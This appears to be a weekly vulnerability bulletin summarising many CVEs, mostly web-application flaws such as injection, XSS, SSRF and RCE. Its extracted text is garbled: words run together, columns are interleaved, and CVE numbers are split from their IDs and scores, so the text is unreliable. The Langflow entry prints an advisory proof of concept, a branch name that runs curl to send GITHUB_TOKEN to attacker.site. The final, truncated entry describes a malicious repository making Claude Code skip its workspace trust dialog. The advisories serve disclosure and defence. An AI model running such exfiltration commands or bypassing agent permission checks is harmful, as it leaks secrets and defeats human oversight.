mod/customcert:manageinanysinglecoursecanreadandsilentlyoverwritecertificateelementsCVE-2026-belongingtoanyothercourseintheMoodleinstallation.Thecore_get_fragmentcallbackeditelement 9.6 MoreDetails30884andthemod_customcert_save_elementwebservicebothfailtoverifythatthesuppliedelementid belongstotheauthorizedcontext,enablingcross-courseinformationdisclosureanddatatampering. Versions4.4.9and5.0.3fixtheissue. WebSocketendpointslackproperauthenticationmechanisms,enablingattackerstoperformunauthorized stationimpersonationandmanipulatedatasenttothebackend.Anunauthenticatedattackercanconnect CVE-2026-totheOCPPWebSocketendpointusingaknownordiscoveredchargingstationidentifier,thenissueor 9.4 MoreDetails29796receiveOCPPcommandsasalegitimatecharger.Giventhatnoauthenticationisrequired,thiscanleadto privilegeescalation,unauthorizedcontrolofcharginginfrastructure,andcorruptionofchargingnetwork datareportedtothebackend. ImproperNeutralizationofArgumentDelimitersinaCommand('ArgumentInjection')vulnerabilityinCVE-2026-SalesforceMarketingCloudEngagementallowsWebServicesProtocolManipulation.Thisissueaffects 9.4 MoreDetails2298MarketingCloudEngagement:beforeJanuary30th,2026. CVE-2026-UseofhardcodedcredentialsinGoHarborHarborversion2.15.0andbelow,allowsattackerstousethe 9.4 MoreDetails4404defaultpasswordandgainaccesstothewebUI. WebSocketendpointslackproperauthenticationmechanisms,enablingattackerstoperformunauthorized stationimpersonationandmanipulatedatasenttothebackend.Anunauthenticatedattackercanconnect CVE-2026-totheOCPPWebSocketendpointusingaknownordiscoveredchargingstationidentifier,thenissueor 9.4 MoreDetails25192receiveOCPPcommandsasalegitimatecharger.Giventhatnoauthenticationisrequired,thiscanleadto privilegeescalation,unauthorizedcontrolofcharginginfrastructure,andcorruptionofchargingnetwork datareportedtothebackend. WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,thestandalonelive streamcontrolendpointatplugin/Live/standAloneFiles/control.json.phpacceptsauser-supplied streamerURLparameterthatoverrideswheretheserversendstokenverificationrequests.AnattackerCVE-2026-canredirecttokenverificationtoaservertheycontrolthatalwaysreturns{"error":false},completely 9.4 MoreDetails33716bypassingauthentication.Thisgrantsunauthenticatedcontroloveranylivestreamontheplatform, includingdroppingactivepublishers,starting/stoppingrecordings,andprobingstreamexistence.Commit 388fcd57dbd16f6cb3ebcdf1d08cf2b929941128containsapatch. ImproperNeutralizationofSpecialElementsusedinanSQLCommand('SQLInjection')vulnerabilityinCVE-2026-CozmoslabsProfileBuilderProallowsBlindSQLInjection.ThisissueaffectsProfileBuilderPro:fromn/a 9.3 MoreDetails27413through3.13.9. WeGIAisawebmanagerforcharitableinstitutions.Versions3.6.5andbelowcontainanauthenticatedSQL Injectionvulnerabilityinthehtml/matPat/restaurarproduto.phpendpoint.Thevulnerabilityallowsan authenticatedattackertoinjectarbitrarySQLcommandsviatheidprodutoGETparameter,leadingtofullCVE-2026-databasecompromise.Inthescript/html/matPat/restaurarproduto.php,theapplicationretrievesthe 9.3 MoreDetails33134idprodutoparameterdirectlyfromthe$GETglobalarrayandinterpolatesitdirectlyintotwoSQLquery stringswithoutanysanitization,type-casting(e.g.,(int)),orusingparameterized(prepare/execute) statements.Thisissuehasbeenfixedinversion3.6.6. WeGIAisawebmanagerforcharitableinstitutions.Versions3.6.6andbelowhaveaReflectedCross-Site Scripting(XSS)vulnerabilityinthenovomemorandoo.phpendpoint.Anattackercaninjectarbitrary JavaScriptintothesccsGETparameter,whichisdirectlyechoedintotheHTMLresponsewithoutanyCVE-2026-sanitizationorencoding.Thescript/html/memorando/novomemorandoo.phpreadsHTTPGETparameters 9.3 MoreDetails33135todisplaydynamicsuccessmessagestotheuser.Atapproximatelyline273,thecodechecksif $GET['msg']equals'success'.Iftrue,itdirectlyconcatenates$_GET['sccs']intoanHTMLalert

and outputsittothebrowser.Thisissuehasbeenfixedinversion3.6.7. SiYuanisapersonalknowledgemanagementsystem.Inversions3.6.0andbelow,SanitizeSVGhasan incompleteblocklist—itblocksdata:text/htmlanddata:image/svg+xmlinhrefattributesbutmisses data:text/xmlanddata:application/xml,bothofwhichcanrenderSVGwithJavaScriptexecution.The unauthenticated/api/icon/getDynamicIconendpointservesuser-controlledinput(viathecontentparameter)CVE-2026- 9.3 MoreDetailsdirectlyintoSVGmarkupusingfmt.Sprintfwithnoescaping,servedasContent-Type:image/svg+xml.This32940 createsaclick-throughXSS:avictimnavigatestoacraftedURL,seesanSVGwithaninjectedlink,and clickingittriggersJavaScriptviathebypassedMIMEtypes.Theattackrequiresdirectnavigationtothe endpointor / embedding,since

tagrenderinginthefrontenddoesn'tallow interactivelinks.Thisissuehasbeenfixedinversion3.6.1. WeGIAisawebmanagerforcharitableinstitutions.Versions3.6.6andbelowhaveaReflectedCross-Site Scripting(XSS)vulnerabilityinthelistarmemorandosativos.phpendpoint.Anattackercaninjectarbitrary JavaScriptorHTMLtagsintothesccdGETparameter,whichisthendirectlyechoedintotheHTMLresponseCVE-2026-withoutanysanitizationorencoding.Thescript/html/memorando/listarmemorandosativos.phphandles 9.333136dynamicsuccessmessagestousersusingquerystringparameters.Similartootherendpointsinthe Memorandomodule,itchecksif$GET['msg']equals'success'.Ifthisconditionismet,itdirectly concatenatesandreflects$GET['sccd']intoanHTMLalert.Thisissueisresolvedinversion3.6.7. FreeScoutisafreehelpdeskandsharedinboxbuiltwithPHP'sLaravelframework.Versions1.8.208and belowarevulnerabletoStoredCross-SiteScripting(XSS)throughFreeScout'semailnotificationtemplates. Incomingemailbodiesarestoredinthedatabasewithoutsanitizationandrenderedunescapedinoutgoing CVE-2026-emailnotificationsusingBlade'srawoutputsyntax{!!$thread->body!!}.Anunauthenticatedattackercan 9.3 MoreDetails32754exploitthisvulnerabilitybysimplysendinganemail,andwhenopenedbyanysubscribedagentoradminas partoftheirnormalworkflow,enablinguniversalHTMLinjection(phishing,tracking)and,invulnerableemail clients,JavaScriptexecution(sessionhijacking,credentialtheft,accounttakeover)affectingallrecipients simultaneously.Thisissuehasbeenfixedinversion1.8.209. WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,anunauthenticated server-siderequestforgeryvulnerabilityinplugin/Live/test.phpallowsanyremoteusertomaketheCVE-2026-AVideoserversendHTTPrequeststoarbitraryURLs.Thiscanbeusedtoprobelocalhost/internalservices 9.3 MoreDetails33502and,whenreachable,accessinternalHTTPresourcesorcloudmetadataendpoints.Commit 1e6cf03e93b5a5318204b010ea28440b0d9a5ab3containsapatch. OpenClawbefore2026.3.7containsanimproperheadervalidationvulnerabilityinfetchWithSsrFGuardthat CVE-2026-forwardscustomauthorizationheadersacrosscross-originredirects.Attackerscantriggerredirectsto 9.3 MoreDetails32913differentoriginstointerceptsensitiveheaderslikeX-Api-KeyandPrivate-Tokenintendedfortheoriginal destination. GraphitiisaframeworkthatsitsontopofmodelsandexposesthemviaaJSON:API-compliantinterface. Versionspriorto1.10.2haveanarbitrarymethodexecutionvulnerabilitythataffectsGraphiti'sJSONAPI writefunctionality.AnattackercancraftamaliciousJSONAPIpayloadwitharbitraryrelationshipnamesto invokeanypublicmethodontheunderlyingmodelinstance,classoritsassociations.Anyapplication exposingGraphitiwriteendpoints(create/update/delete)tountrustedusersisaffected.The Graphiti::Util::ValidationResponse#all_valid?methodrecursivelycallsmodel.send(name)usingCVE-2026-relationshipnamestakendirectlyfromuser-suppliedJSONAPIpayloads,withoutvalidatingthemagainstthe33286resource'sconfiguredsideloads.Thisallowsanattackertopotentiallyrunanypublicmethodonagiven modelinstance,ontheinstanceclassorassociatedinstancesorclasses,includingdestructiveoperations. ThisispatchedinGraphitiv1.10.2.Usersshouldupgradeassoonaspossible.Someworkaroundsare available.EnsureGraphitiwriteendpoints(create/update)arenotaccessibletountrustedusersand/orapply strongauthenticationandauthorizationchecksbeforeanywriteoperationisprocessed,forexampleuse Railsstrongparameterstoensureonlyvalidparametersareprocessed. TheWPDSGVOTools(GDPR)pluginforWordPressisvulnerabletounauthorizedaccountdestructioninall versionsupto,andincluding,3.1.38.Thisisduetothesuper-unsubscribeAJAXactionacceptinga process_nowparameterfromunauthenticatedusers,whichbypassestheintendedemail-confirmationflow CVE-2026-andimmediatelytriggersirreversibleaccountanonymization.Thismakesitpossibleforunauthenticated 4283attackerstopermanentlydestroyanynon-administratoruseraccount(passwordrandomized, username/emailoverwritten,rolesstripped,commentsanonymized,sensitiveusermetawiped)by submittingthevictim'semailaddresswithprocess_now=1.Thenoncerequiredfortherequestispublicly availableonanypagecontainingthe[unsubscribe_form]shortcode. CVE-2026-Out-of-boundsReadvulnerabilityinfabiangreffrathwoof.Thisissueaffectswoof:beforewoof15.3.0. 9.1 MoreDetails4750 CVE-2026-Out-of-boundsReadvulnerabilityinslajerekRetroDebugger.ThisissueaffectsRetroDebugger:before 4753 9.1v0.64.72. LangflowisatoolforbuildinganddeployingAI-poweredagentsandworkflows.Anunauthenticatedremote shellinjectionvulnerabilityexistsinmultipleGitHubActionsworkflowsintheLangflowrepositorypriorto version1.9.0.UnsanitizedinterpolationofGitHubcontextvariables(e.g.,`${{github.headref}})inrun:stepsallowsattackerstoinjectandexecutearbitraryshellcommandsviaamaliciousbranchnameorpull requesttitle.Thiscanleadtosecretexfiltration(e.g.,GITHUBTOKEN),infrastructuremanipulation,or supplychaincompromiseduringCI/CDexecution.Version1.9.0patchesthevulnerability.---###Details Severalworkflowsin.github/workflows/and.github/actions/referenceGitHubcontextvariablesdirectly inrun:shellcommands,suchas:``yamlrun:|validatebranchname"${{ github.event.pullrequest.head.ref}}"Or:yamlrun:npxplaywrightinstall${{inputs.browsers}}-- with-depsSince`github.head_ref`,`github.event.pull_request.title`,andcustom`inputs.*`maycontain **user-controlledvalues**,theymustbetreatedas**untrustedinput**.Directinterpolationwithoutproper quotingorsanitizationleadstoshellcommandinjection.---###PoC1.**Fork**theLangflowrepository2.CVE-2026-**Createanewbranch**withthename:bashinjection-test&&curlhttps://attacker.site/exfil?33475token=$GITHUB_TOKEN```3.**OpenaPullRequest**tothemainbranchfromthenewbranch4.GitHub Actionswillruntheaffectedworkflow(e.g.,deploy-docs-draft.yml)5.Therun:stepcontaining:yaml echo"Branch:${{github.head_ref}}"Willexecute:bashecho"Branch:injection-test"curl https://attacker.site/exfil?token=$GITHUB_TOKEN6.TheattackerreceivestheCIsecretviatheexfilURL. ---###Impact-Type:ShellInjection/RemoteCodeExecutioninCI-Scope:AnypublicLangflow forkwithGitHubActionsenabled-Impact:FullaccesstoCIsecrets(e.g.,GITHUB_TOKEN),possibility topushmalicioustagsorimages,tamperwithreleases,orleaksensitiveinfrastructuredata---### SuggestedFixRefactoraffectedworkflowstouseenvironmentvariablesandwrapthemindouble quotes:yamlenv:BRANCH_NAME:${{github.head_ref}}run:|echo"Branchis:\"$BRANCH_NAME\""Avoiddirect${{...}}interpolationinsiderun:foranyuser-controlledvalue.---###AffectedFiles (Langflow1.3.4)-.github/actions/install-playwright/action.yml-.github/workflows/deploy-docs- draft.yml-.github/workflows/docker-build.yml-.github/workflows/release_nightly.yml- .github/workflows/python_test.yml-.github/workflows/typescript_test.yml LoLLMsWEBUIprovidestheWebuserinterfaceforLordofLargeLanguageandMultimodalSystems.A criticalServer-SideRequestForgery(SSRF)vulnerabilityhasbeenidentifiedinallknownexistingversionsof CVE-2026-lollms-webui.The@router.post("/api/proxy")endpointallowsunauthenticatedattackerstoforcethe 33340serverintomakingarbitraryGETrequests.Thiscanbeexploitedtoaccessinternalservices,scanlocal networks,orexfiltratesensitivecloudmetadata(e.g.,AWS/GCPIAMtokens).Asoftimeofpublication,no knownpatchedversionsareavailable. CVE-2026-Incorrectboundaryconditions,uninitializedmemoryintheJavaScriptEnginecomponent.Thisvulnerability 4716affectsFirefox<149,FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. CVE-2026-UninitializedmemoryintheGraphics:Canvas2Dcomponent.ThisvulnerabilityaffectsFirefox<149,Firefox 4715 AVideoisavideo-sharingPlatform.Versionspriorto8.0containaServer-SideRequestForgeryvulnerability (CWE-918)inthepublicthumbnailendpointsgetImage.phpandgetImageMP4.php.Bothendpointsaccepta base64UrlGETparameter,base64-decodeit,andpasstheresultingURLtoffmpegasaninputsource withoutanyauthenticationrequirement.ThepriorvalidationonlycheckedthattheURLwassyntacticallyCVE-2026-valid(FILTERVALIDATEURL)andstartedwithhttp(s)://.Thisisinsufficient:anattackercansupplyURLs33024suchashttp://169.254.169.254/latest/meta-data/(AWS/cloudinstancemetadata),http://192.168.x.x/,or http://127.0.0.1/tomaketheserverreachinternalnetworkresources.Theresponseisnotdirectlyreturned (blind),buttimingdifferencesanderrorlogscanbeusedtoinferresults.Theissuehasbeenfixedinversion 8.0. ActiveStorageallowsuserstoattachcloudandlocalfilesinRailsapplications.Priortoversions8.1.2.1, 8.0.4.1,and7.2.3.1,ActiveStorage'sDiskService#delete_prefixedpassesblobkeysdirectlytoDir.globCVE-2026-withoutescapingglobmetacharacters.Ifablobkeycontainsattacker-controlledinputorcustom-generated33202keyswithglobmetacharacters,itmaybepossibletodeleteunintendedfilesfromthestoragedirectory. Versions8.1.2.1,8.0.4.1,and7.2.3.1containapatch. Admidioisanopen-sourceusermanagementsolution.Inversions5.0.0through5.0.6,thedocumentsand filesmoduledoesnotverifywhetherthecurrentuserhaspermissiontodeletefoldersorfiles.The folderdeleteandfiledeleteactionhandlersinmodules/documents-files.phponlyperformaVIEW authorizationcheck(getFolderForDownload/getFileForDownload)beforecallingdelete(),andtheyneverCVE-2026-validateaCSRFtoken.BecausethetargetUUIDsarereadfrom$GET,deletioncanbetriggeredbyaplain32817HTTPGETrequest.Whenthemoduleisinpublicmode(documentsfilesmoduleenabled=1)andafolder ismarkedpublic(folpublic=true),anunauthenticatedattackercanpermanentlydestroytheentire documentlibrary.Evenwhenthemodulerequireslogin,anyuserwithview-onlyaccesscandeletecontent theyareonlypermittedtoread.Thisissuehasbeenfixedinversion5.0.7. AvulnerabilityinMLflow'spyfuncextractionprocessallowsforarbitraryfilewritesduetoimproperhandling oftararchiveentries.Specifically,theuseoftarfile.extractallwithoutpathvalidationenablescrafted CVE-2025-tar.gzfilescontaining..orabsolutepathstoescapetheintendedextractiondirectory.Thisissueaffects 15031thelatestversionofMLflowandposesahigh/criticalriskinscenariosinvolvingmulti-tenantenvironmentsor ingestionofuntrustedartifacts,asitcanleadtoarbitraryfileoverwritesandpotentialremotecode execution. HTSlibisalibraryforreadingandwritingbioinformaticsfileformats.CRAMisacompressedformatwhich storesDNAsequencealignmentdata.Asonemethodofremovingredundantdata,CRAMusesreference- basedcompressionsothatinsteadofstoringthefullsequenceforeachalignmentrecorditstoresalocation inanexternalreferencesequencealongwithalistofdifferencestothereferenceatthatlocationasa sequenceof"features".WhendecodingCRAMrecords,thereferencedataisstoredinachararray,and CVE-2026-partsmatchingthealignmentrecordsequencearecopiedoverasnecessary.Duetoinsufficientvalidation 31966ofthefeaturedataseries,itwaspossibletomakethe`cramdecode_seq()`functioncopydatafromeither beforethestart,oraftertheendofthestoredreferenceeitherintothebufferusedtostoretheoutput

sequenceforthecramrecord,orintothebufferusedtobuildtheSAMMDtag.Thisallowedarbitrarydata tobeleakedtothecallingfunction.Thisbugmayallowinformationaboutprogramstatetobeleaked.It mayalsocauseaprogramcrashthroughanattempttoaccessinvalidmemory.Versions1.23.1,1.22.2and 1.21.1includefixesforthisissue.Thereisnoworkaroundforthisissue. CVE-2026-UnrestrictedUploadofFilewithDangerousTypevulnerabilityinSyarifMobileAppEditorallowsUploada 27067WebShelltoaWebServer.ThisissueaffectsMobileAppEditor:fromn/athrough1.3.1. OpenEMRisafreeandopensourceelectronichealthrecordsandmedicalpracticemanagementapplication. CVE-2026-Versionspriorto8.0.0.2containaCommandinjectionvulnerabilityinthebackupfunctionalitythatcanbe 32238exploitedbyauthenticatedattackers.Thevulnerabilityexistsduetoinsufficientinputvalidationinthe backupfunctionality.Version8.0.0.2fixestheissue. CensusCSWeb8.0.1allows"app/config"tobereachableviaHTTPinsomedeployments.Aremote,CVE-2025-unauthenticatedattackercouldsendrequeststoconfigurationfilesandobtainleakedsecrets.Fixedin8.1.060949alpha. WhenapplicationsspecifyHTTPresponseheadersforservletapplicationsusingSpringSecurity,thereisthe possibilitythattheHTTPHeaderswillnotbewritten.ThisissueaffectsSpringSecurity:from5.7.0throughCVE-2026- 9.15.7.21,from5.8.0through5.8.23,from6.3.0through6.3.14,from6.4.0through6.4.14,from6.5.0through22732 6.5.8,from7.0.0through7.0.3. SuiteCRMisanopen-source,enterprise-readyCustomerRelationshipManagement(CRM)software application.ACriticalRemoteCodeExecution(RCE)vulnerabilityexistsinSuiteCRM7.15.0and8.9.2, allowingauthenticatedadministratorstoexecutearbitrarysystemcommands.Thisvulnerabilityisadirect PatchBypassofCVE-2024-49774.Althoughthevendorattemptedtofixtheissueinversion7.14.5,theCVE-2026-underlyingflawinModuleScanner.phpregardingPHPtokenparsingremains.Thescannerincorrectlyresets29103itsinternalstate($checkFunctionflag)whenencounteringanysingle-charactertoken(suchas=,.,or;). Thisallowsattackerstohidedangerousfunctioncalls(e.g.,system(),exec())usingvariableassignmentsor stringconcatenation,completelyevadingtheMLPsecuritycontrols.Versions7.15.1and8.9.3patchthe issue. Glancesisanopen-sourcesystemcross-platformmonitoringtool.Priortoversion4.5.2,inCentralBrowser mode,the/api/4/serverslistendpointreturnsrawserverobjectsfrom GlancesServersList.get_servers_list().Thoseobjectsaremutatedin-placeduringbackgroundpollingand cancontainaurifieldwithembeddedHTTPBasiccredentialsfordownstreamGlancesservers,usingtheCVE-2026-reusablepbkdf2-derivedGlancesauthenticationsecret.IfthefrontGlancesBrowser/APIinstanceisstarted32633without--password,whichissupportedandcommonforinternalnetworkdeployments,/api/4/serverslist iscompletelyunauthenticated.AnynetworkuserwhocanreachtheBrowserAPIcanretrievereusable credentialsforprotecteddownstreamGlancesserversoncetheyhavebeenpolledbythebrowserinstance.

OpenProjectisanopen-source,web-basedprojectmanagementsoftware.Versionspriorto16.6.9,17.0.6, 17.1.3,and17.2.1arevulnerabletoanSQLinjectionattackviaacustomfield'sname.Whenthatcustom fieldwasusedinaCostReport,thecustomfield'snamewasinjectedintotheSQLquerywithoutproper sanitation.ThisallowedanattackertoexecutearbitrarySQLcommandsduringthegenerationofaCost Report.Ascustomfieldscanonlybegeneratedbyuserswithfulladministratorprivileges,theattacksurface CVE-2026-issomewhatreduced.TogetherwithanotherbugintheRepositories_module,thatusedtheprojectidentifier 32698withoutsanitationtogeneratethecheckoutpathforagitrepositoryinthefilesystem,thisallowedan attackertocheckoutagitrepositorytoanarbitrarilychosenpathontheserver.Ifthecheckoutisdone withincertainpathswithintheOpenProjectapplication,uponthenextrestartoftheapplication,thisallows theattackertoinjectrubycodeintotheapplication.Astheprojectidentifiercannotbemanuallyeditedto anystringcontainingspecialcharacterslikedotsorslashes,thisneedstobechangedviatheSQLinjection describedabove.Versions16.6.9,17.0.6,17.1.3,and17.2.1fixtheissue. CVE-2026-TheWiFiExtenderWDR201A(HWV2.1,FWLFMZX28040922V1.02)exposesanunprotectedUARTinterface 30704throughaccessiblehardwarepadsonthePCB ThewebinterfaceoftheWiFiExtenderWDR201A(HWV2.1,FWLFMZX28040922V1.02)containshardcoded CVE-2026-credentialdisclosuremechanisms(intheformofServerSideInclude)withinmultipleserver-sidewebpages, 30701includinglogin.shtmlandsettings.shtml.Thesepagesembedserver-sideexecutiondirectivesthat dynamicallyretrieveandexposethewebadministrationpasswordfromnon-volatilememoryatruntime. gRPC-GoistheGolanguageimplementationofgRPC.Versionspriorto1.79.3haveanauthorizationbypass resultingfromimproperinputvalidationoftheHTTP/2:pathpseudo-header.ThegRPC-Goserverwastoo lenientinitsroutinglogic,acceptingrequestswherethe:pathomittedthemandatoryleadingslash(e.g., Service/Methodinsteadof/Service/Method).Whiletheserversuccessfullyroutedtheserequeststothe correcthandler,authorizationinterceptors(includingtheofficialgrpc/authzpackage)evaluatedtheraw, non-canonicalpathstring.Consequently,"deny"rulesdefinedusingcanonicalpaths(startingwith/)failed tomatchtheincomingrequest,allowingittobypassthepolicyifafallback"allow"rulewaspresent.This affectsgRPC-Goserversthatusepath-basedauthorizationinterceptors,suchastheofficialRBAC CVE-2026-implementationingoogle.golang.org/grpc/authzorcustominterceptorsrelyingoninfo.FullMethodor 33186grpc.Method(ctx);ANDthathaveasecuritypolicycontainsspecific"deny"rulesforcanonicalpathsbut allowsotherrequestsbydefault(afallback"allow"rule).Thevulnerabilityisexploitablebyanattackerwho

cansendrawHTTP/2frameswithmalformed:pathheadersdirectlytothegRPCserver.Thefixinversion 1.79.3ensuresthatanyrequestwitha:paththatdoesnotstartwithaleadingslashisimmediately rejectedwithacodes.Unimplementederror,preventingitfromreachingauthorizationinterceptorsor handlerswithanon-canonicalpathstring.Whileupgradingisthemostsecureandrecommendedpath, userscanmitigatethevulnerabilityusingoneofthefollowingmethods:Useavalidatinginterceptor (recommendedmitigation);infrastructure-levelnormalization;and/orpolicyhardening. ServiceinformationisnotencryptedwhentransmittedasBACnetpacketsoverthewire,andcanbesniffed, CVE-2026-intercepted,andmodifiedbyanattacker.ValuableinformationsuchastheFileStartPositionandFileData 24060canbesniffedfromnetworktrafficusingWireshark'sBACnetdissectorfilter.Theproprietaryformatusedby WebCTRLtoreceiveupdatesfromthePLCcanalsobesniffedandreverseengineered. Versionsofthepackagejsrsasignfrom7.0.0andbefore11.1.1arevulnerabletoIncompleteComparison CVE-2026-withMissingFactorsviathegetRandomBigIntegerZeroToMaxandgetRandomBigIntegerMinToMaxfunctions 4599insrc/crypto-1.1.js;anattackercanrecovertheprivatekeybyexploitingtheincorrectcompareTochecks thatacceptout-of-rangecandidatesandthusbiasDSAnoncesduringsignaturegeneration. WWBNAVideoisanopensourcevideoplatform.Priortoversion26.0,thesetPassword.json.phpendpoint intheCustomizeUserpluginallowsadministratorstosetachannelpasswordforanyuser.Duetoalogic CVE-2026-errorinhowthesubmittedpasswordvalueisprocessed,anypasswordcontainingnon-numericcharactersis 33297silentlycoercedtotheintegerzerobeforebeingstored.Thismeansthatregardlessoftheintended password,thestoredchannelpasswordbecomes0,whichanyvisitorcantriviallyguesstobypasschannel- levelaccesscontrol.Version26.0containsapatchfortheissue. WWBNAVideoisanopensourcevideoplatform.Priortoversion26.0,aServer-SideRequestForgery(SSRF) vulnerabilityexistsinplugin/Live/standAloneFiles/saveDVR.json.php.WhentheAVideoLivepluginis CVE-2026-deployedinstandalonemode(theintendedconfigurationforthisfile),the$_REQUEST['webSiteRootURL'] 33351parameterisuseddirectlytoconstructaURLthatisfetchedserver-sideviafile_get_contents().No authentication,originvalidation,orURLallowlistingisperformed.Version26.0containsapatchforthe issue. HTSlibisalibraryforreadingandwritingbioinformaticsfileformats.CRAMisacompressedformatwhich storesDNAsequencealignmentdata.Inthecram_decode_slice()functioncalledwhilereadingCRAM records,thevalueofthematereferenceidfieldwasnotvalidated.Lateruseofthisvalue,forexamplewhen convertingthedatatoSAMformat,couldresultintheoutofboundsarrayreadswhenlookinguptheCVE-2026-correspondingreferencename.Ifthearrayvalueobtainedalsohappenedtobeavalidpointer,itwouldbe31967interpretedasastringandanattemptwouldbemadetowritethedataaspartoftheSAMrecord.Thisbug mayallowinformationaboutprogramstatetobeleaked.Itmayalsocauseaprogramcrashthroughan attempttoaccessinvalidmemory.Versions1.23.1,1.22.2and1.21.1includefixesforthisissue.Thereisno workaroundforthisissue. SiYuanisapersonalknowledgemanagementsystem.Inversions3.6.0andbelow,themobilefiletree (MobileFiles.ts)rendersnotebooknamesviainnerHTMLwithoutHTMLescapingwhenprocessing renamenotebookWebSocketevents.Thedesktopversion(Files.ts)properlyusesescapeHtml()forthesame operation.AnauthenticateduserwhocanrenamenotebookscaninjectarbitraryHTML/JavaScriptthatCVE-2026- 9.0executesonanymobileclientviewingthefiletree.SinceElectronisconfiguredwithnodeIntegration:true32751 andcontextIsolation:false,theinjectedJavaScripthasfullNode.jsaccess,escalatingstoredXSStofull remotecodeexecution.ThemobilelayoutisalsousedintheElectrondesktopappwhenthewindowis narrow,makingthisexploitableondesktopaswell.Thisissuehasbeenfixedinversion3.6.1.

OpenProjectisanopen-source,web-basedprojectmanagementsoftware.Inversionspriorto16.6.9,17.0.6, 17.1.3,and17.2.1,theRepositoriesmoduledidnotproperlyescapefilenamesdisplayedfromrepositories. CVE-2026-Thisallowedanattackerwithpushaccessintotherepositorytocreatecommitswithfilenamesthatincluded 9.0 MoreDetails32703HTMLcodethatwasinjectedinthepagewithoutpropersanitation.ThisallowedapersistedXSSattack againstallmembersofthisprojectthataccessedtherepositoriespagetodisplayachangesetwherethe maliciouslycraftedfilewasdeleted.Versions16.6.9,17.0.6,17.1.3,and17.2.1fixtheissue. UnrestrictedUploadofFilewithDangerousTypevulnerabilityinRymeraWebCoPtyLtd.WoocommerceCVE-2026-WholesaleLeadCaptureallowsUsingMaliciousFiles.ThisissueaffectsWoocommerceWholesaleLead 9.0 MoreDetails27540Capture:fromn/athrough2.0.3.1. AnchorrisaDiscordbotforrequestingmoviesandTVshowsandreceivingnotificationswhenitemsare addedtoamediaserver.Versions1.4.1andbelowcontainastoredXSSvulnerabilityintheJellyseerruser selector.JellyseerrallowsanyaccountholdertoexecutearbitraryJavaScriptintheAnchorradmin'sbrowser session.Theinjectedscriptcallstheauthenticated/api/configendpoint-whichreturnsthefullapplicationCVE-2026-configurationinplaintext.ThisallowstheattackertoforgeavalidAnchorrsessiontokenandgainfulladmin 9.0 MoreDetails32891accesstothedashboardwithnoknowledgeoftheadminpassword.Thesameresponsealsoexposesthe APIkeysandtokensforeveryintegratedservice,resultinginsimultaneousaccounttakeoveroftheJellyfin mediaserver(viaJELLYFINAPIKEY),theJellyseerrrequestmanager(viaJELLYSEERRAPIKEY),andthe Discordbot(viaDISCORD_TOKEN).Thisissuehasbeenfixedinversion1.4.2. SiYuanisapersonalknowledgemanagementsystem.Inversions3.6.0andbelow,thebackend renderREADMEfunctionuseslute.New()withoutcallingSetSanitize(true),allowingrawHTMLembeddedin

Markdowntopassthroughunmodified.ThefrontendthenassignstherenderedHTMLtoinnerHTMLwithoutCVE-2026- 9.0 MoreDetails 33066anyadditionalsanitization.AmaliciouspackageauthorcanembedarbitraryJavaScriptintheirREADMEthat executeswhenauserclickstoviewthepackagedetails.BecauseSiYuan'sElectronconfigurationenables nodeIntegration:truewithcontextIsolation:false,thisXSSescalatesdirectlytofullRemoteCodeExecution. Theissuewaspatchedinversion3.6.1. SiYuanisapersonalknowledgemanagementsystem.Versions3.6.0andbelowrenderpackagemetadata fields(displayName,description)usingtemplateliteralswithoutHTMLescaping.Amaliciouspackageauthor caninjectarbitraryHTML/JavaScriptintothesefields,whichexecutesautomaticallywhenanyuserbrowsesCVE-2026-theBazaarpage.BecauseSiYuan'sElectronconfigurationenablesnodeIntegration:truewith 9.0 MoreDetails33067contextIsolation:false,thisXSSescalatesdirectlytofullRemoteCodeExecutiononthevictim'soperating system—withzerouserinteractionbeyondopeningthemarketplacetab.Thisissuehasbeenfixedin version3.6.1. NVIDIAAPEXforLinuxcontainsavulnerabilitywhereanunauthorizedattackercouldcauseadeserialization CVE-2025-ofuntrusteddata.ThisvulnerabilityaffectsenvironmentsthatusePyTorchversionsearlierthan2.6.A 9.0 MoreDetails33244successfulexploitofthisvulnerabilitymightleadtocodeexecution,denialofservice,escalationof privileges,datatampering,andinformationdisclosure.

OTHERVULNERABILITIES

CVE Base Description ReferenceNumber Score

CVE- AvulnerabilitywasdeterminedinUTTHiPER1200GWupto2.5.3-170306.Thisimpactsthefunctionstrcpyofthe More2026- file/goform/websHostFilter.Thismanipulationcausesbufferoverflow.Itispossibletoinitiatetheattackremotely. 8.8 Details4487 Theexploithasbeenpubliclydisclosedandmaybeutilized. CVE- OutofboundsreadandwriteinWebAudioinGoogleChromepriorto146.0.7680.153allowedaremoteattacker More2026- 8.8 topotentiallyexploitheapcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4459 Asecurityissuewasdiscoverediningress-nginxwhereacombinationofIngressannotationscanbeusedtoinjectCVE- configurationintonginx.Thiscanleadtoarbitrarycodeexecutioninthecontextoftheingress-nginxcontroller, More2026- 8.8 anddisclosureofSecretsaccessibletothecontroller.(Notethatinthedefaultinstallation,thecontrollercan Details4342 accessallSecretscluster-wide.) CVE- TypeConfusioninV8inGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentiallyexploit More2026- 8.8 heapcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4457 CVE- VitalsESPdevelopedbyGalaxySoftwareServiceshasaIncorrectAuthorizationvulnerability,allowing More2026- 8.8 authenticatedremoteattackerstoperformcertainadministrativefunctions,therebyescalatingprivileges. Details4639 CVE- UseafterfreeinExtensionsinGoogleChromepriorto146.0.7680.153allowedanattackerwhoconvincedauser More2026- toinstallamaliciousextensiontopotentiallyexploitheapcorruptionviaacraftedChromeExtension.(Chromium 8.8 Details4458 securityseverity:High) ClipBucketv5isanopensourcevideosharingplatform.Anauthenticatedtime-basedblindSQLinjectionCVE- vulnerabilityexistsinClipBucketpriorto5.5.3#80withintheactions/ajax.phpendpoint.Duetoinsufficient More2026- 8.8 inputsanitizationoftheuseridparameter,anauthenticatedattackercanexecutearbitrarySQLqueries,leading Details32321 tofulldatabasedisclosureandpotentialadministrativeaccounttakeover.Version5.5.3#80fixestheissue. ClaudeCodeisanagenticcodingtool.Versionspriorto2.1.53resolvedthepermissionmodefromsettingsfiles, includingtherepo-controlled.claude/settings.json,beforedeterminingwhethertodisplaytheworkspacetrust CVE- confirmationdialog.Amaliciousrepositorycouldsetpermissions.defaultModetobypassPermissionsinits More2026- 